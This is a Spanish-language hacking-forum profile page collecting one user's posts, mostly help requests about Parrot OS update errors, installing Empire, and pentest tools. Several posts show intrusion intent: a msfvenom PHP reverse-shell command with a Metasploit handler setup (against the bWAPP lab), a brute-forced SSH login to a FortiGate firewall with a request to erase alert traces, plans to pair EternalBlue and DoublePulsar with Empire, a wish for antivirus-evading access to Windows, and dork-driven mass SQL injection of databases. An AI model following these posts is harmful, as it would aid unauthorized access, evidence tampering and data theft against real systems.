Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - $B3L3r0F0nt3$

Páginas: [1]
1
Hola Underc0des;

Tengo un problema a la hora de querer actualizar el Sistema de Parrot Security OS.

sudo apt-get update && sudo apt-get dist-upgrade

Al parecer me sale un Error de Certificado.

Err:1 https://mirror.uta.edu.ec/parrot stable/main amd64 bash amd64 4.4.18-1.1
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:2 https://mirror.uta.edu.ec/parrot stable/main amd64 bsdutils amd64 1:2.31.1-0.4
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:3 https://mirror.uta.edu.ec/parrot stable/main amd64 dash amd64 0.5.8-2.10
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:4 https://mirror.uta.edu.ec/parrot stable/main amd64 libcom-err2 amd64 1.43.9-2
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:5 https://mirror.uta.edu.ec/parrot stable/main amd64 libcomerr2 amd64 1.43.9-2
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:6 https://mirror.uta.edu.ec/parrot stable/main amd64 libc-l10n all 2.27-1
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:7 https://mirror.uta.edu.ec/parrot stable/main amd64 locales-all amd64 2.27-1
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:8 https://mirror.uta.edu.ec/parrot stable/main amd64 locales all 2.27-1
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:9 https://mirror.uta.edu.ec/parrot stable/main amd64 libc6-dbg amd64 2.27-1
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:10 https://mirror.uta.edu.ec/parrot stable/main amd64 libc-dev-bin amd64 2.27-1
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:11 https://mirror.uta.edu.ec/parrot stable/main amd64 libc6-dev amd64 2.27-1
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:12 https://mirror.uta.edu.ec/parrot stable/main amd64 libc6 amd64 2.27-1
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:13 https://mirror.uta.edu.ec/parrot stable/main amd64 libc-bin amd64 2.27-1
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:14 https://mirror.uta.edu.ec/parrot stable/main amd64 debconf-i18n all 1.5.66
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
Err:15 https://mirror.uta.edu.ec/parrot stable/main amd64 libgdbm5 amd64 1.14.1-4
  Certificate verification failed: The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.  Could not handshake: Error in the certificate verification. [IP: 200.93.227.165 443]
0% [Connected to mirror.uta.edu.ec (200.93.227.165)] [Esperando las cabeceras]^C
---------------------------------------------------------------------------------------

Lo que quiero saber por que motivo me sale ese error, o no necesitaría actualizar el Sistema.

Por favor se me podrían apoyar.

Saludos cordiales.

2
Hola estimados Underc0des;

Por favor necesito un apoyo con referente a la instalación de Empire en Kali Linux, cuando quiero iniciar el programa en mi consola tengo el siguiente problema que me aparece.

Código: [Seleccionar]
[email protected]:~/Desktop/Github/Empire# ./empire
[*] Loading stagers from: /root/Desktop/Github/Empire//lib/stagers/
[*] Loading modules from: /root/Desktop/Github/Empire//lib/modules/
[*] Loading listeners from: /root/Desktop/Github/Empire//lib/listeners/
Traceback (most recent call last):
  File "./empire", line 1383, in <module>
    main = empire.MainMenu(args=args)
  File "/root/Desktop/Github/Empire/lib/common/empire.py", line 103, in __init__
    self.listeners = listeners.Listeners(self, args=args)
  File "/root/Desktop/Github/Empire/lib/common/listeners.py", line 35, in __init__
    self.load_listeners()
  File "/root/Desktop/Github/Empire/lib/common/listeners.py", line 60, in load_listeners
    self.loadedListeners[listenerName] = imp.load_source(listenerName, filePath).Listener(self.mainMenu, [])
  File "/root/Desktop/Github/Empire//lib/listeners/dbx.py", line 6, in <module>
    import dropbox
  File "/usr/local/lib/python2.7/dist-packages/dropbox/__init__.py", line 3, in <module>
    from .dropbox import __version__, Dropbox, DropboxTeam, create_session  # noqa: F401
  File "/usr/local/lib/python2.7/dist-packages/dropbox/dropbox.py", line 17, in <module>
    import requests
  File "/usr/lib/python2.7/dist-packages/requests/__init__.py", line 44, in <module>
    import chardet
  File "/usr/lib/python2.7/dist-packages/chardet/__init__.py", line 20, in <module>
    from .universaldetector import UniversalDetector
  File "/usr/lib/python2.7/dist-packages/chardet/universaldetector.py", line 48, in <module>
    from .sbcsgroupprober import SBCSGroupProber
  File "/usr/lib/python2.7/dist-packages/chardet/sbcsgroupprober.py", line 37, in <module>
    from .langthaimodel import TIS620ThaiModel
EOFError: EOF read where object expected

Ya tengo preparado EternalBlue, DoublePulsar y pensaba usarlo con Empire paa mis ataques de Post-Explotacion.

Tengo actualizado mi sistema de Kali Linux:

Código: [Seleccionar]
[email protected]:~# apt-get update && apt-get upgrade && apt-get dist-upgrade
También he cambiado mi arquitectura de mi Sistema para los paquetes de instalación de wine32.

Código: [Seleccionar]
[email protected]:~# dpkg --add-architecture i386
También tengo instalado wine32:

Código: [Seleccionar]
[email protected]:~# apt-get install wine winetricks wine32-preloader
Prácticamente ya tengo preparado todo, exsecto el Empire, y asta ahora no e podido encontrar una solución útil.

Por favor necesito su apoyo con este tema.

Saludos Cordiales.

3
Estimados Underc0des;

Por favor necesito de su apoyo con un tema que tengo varios días, sobre como Eliminar Alert Message Console - FortiGate FortiOS v5.4.4.

1.-En primera instancia conseguí realizar ataques de Fuerza Bruta con Hydra y consegui autenticarme por SSH desde Kali Linux 2017.3 a un Firewall FortiGate que tiene la Versión de IOS 5.4.4.
2.-Pero necesito saber que comando por CLI estaría aplicando en la consola del Firewall FortiGate, para poder Eliminar mi rastro que estaría apareciendo en los Mensajes de alerta vía Console del Firewall FortiGate.

Saludos cordiales.

4
Debates y Reviews / Re:¿Cual es la Mejor Distribucion de Linux?
« en: Febrero 26, 2018, 09:49:48 pm »
Hola estimado, por mi lado yo Uso ahora Kali Linux, pero te recomiendo 2 distribuciones mas que son muy buenas llamadas:

-BlackBuntu. - Enlace: https://sourceforge.net/projects/blackbuntu/
-Parrot Security. - Enlace: https://www.parrotsec.org/download-full.fx

Son muy buenas  y sencillos de manejar, as tus pruebas de Pentesting y saca tus propias conclusiones.

Saludos.

5
Debates y Reviews / Re:Mantener anonimidad mientras atacas tu victima!!
« en: Febrero 26, 2018, 09:32:29 pm »
Hola Estimado, sobre tu pregunta yo Uso una VPN  muy buena llamada "Hotspot Shield"

Búscalo en este enlace: https://www.hotspotshield.com/es/

Te permite cambiar de Ubicación a cualquier país que deseas y añádelo Proxychains, tus ataques serán mas eficaz.

Saludos.

6
Estimados Underc0ders;

Tengo varios días intentando resolver el problema de File Upload Exploitation in bWAPP (Bypass All Security), Y cada vez que lanzo mi exploit utilizando "exploit /multi/handler", no e podido iniciar el meterpreter> en la maquina de la victima o localhost, estoy Utilizando para PoC Kal Linux 2017.3 la herramienta de "bWAPP", también e intentando realizarlo desde Windows10 utilizando PentestBox-with-Metasploit-v2.2 y bWAPP dentro del Windows10 y no e tenido éxito, a continuación les muestro el proceso que realiza.

Creación de la Carga Útil con MSFVenom:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<My_IP> LPORT=4444 -f raw > shell.php

Uso de módulos auxiliares metasploit:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.150
LHOST => 192.168.1.150
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

  • Started reverse TCP handler on 192.168.1.150:4444
  • Sending stage (37543 bytes) to 192.168.1.150
  • 192.168.1.150 - Meterpreter session 1 closed.  Reason: Died

----------------------------------------------------------------------
Les agradecería su apoyo con este tema.

Gracias.

7
Dudas y pedidos generales / Hacking Win10 - Wn2012-R2 y Win2016
« en: Febrero 17, 2018, 11:08:20 pm »
Hola Estimados;

Necesito un aporte sobre, mejores técnicas y herramientas para Realizar ataques de Post-Explotacion con Metasploit, normalmente yo utilizo - TheFatRat y MSFVenom en Kali Linux, pero necesito saber que mas herramientas existen y que me podrían ayudar en Acceder silenciosamente sin ser detectado por un Antvirus a un Sistema de Windows.

Gracias..

8
Gracias Estimado por la información, se me va ser muy util.
He estado realizando Penetración multiples base de datos gracias a los DORKS que me conseguí y a la vez utilizando herramientas como:

-Havij
-SQLI-Hunter.
-SQLmap
-Burp Suite Pro.

Si tienes otras herramientas que me permitan obtener multiples base de datos de diferentes plataformas, encantado para poder perfeccionar algunos Laboratorios.

Saludos.

Páginas: [1]